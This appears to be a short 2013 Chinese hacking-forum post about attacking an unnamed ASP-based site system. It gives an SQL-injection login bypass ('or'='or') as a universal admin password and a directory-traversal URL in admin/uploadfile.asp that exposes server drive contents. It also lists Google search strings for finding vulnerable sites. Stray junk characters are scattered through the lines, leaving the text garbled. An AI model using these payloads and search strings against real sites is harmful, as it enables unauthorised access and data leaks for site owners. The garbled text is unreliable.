后台万能密码 'or'='or'
" L0 G4 J4 q n7 q2 Q# F, g( D+ e( U3 }
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!. ^! d7 _3 g- g% ^9 s2 E5 O
admin/uploadfile.asp?currentFolder=/upfiles/../$ P6 n# N3 D" z; m. |
. s( k; P+ g, b# S, @漏洞证明:
; T Q0 @5 h( c5 e% ^. X9 W- Y. |* c' k5 @7 s* `% v
谷歌:inurl:type.asp?id=1 新闻中心
7 n/ s. i) r7 A/ C3 q$ F5 A或者 :inurl:download_ok.asp?
( m( }& [* }* ?! C4 O
( F- E3 |3 }1 u4 Q |
发表于 2013-3-14 20:17:32
收藏
支持
反对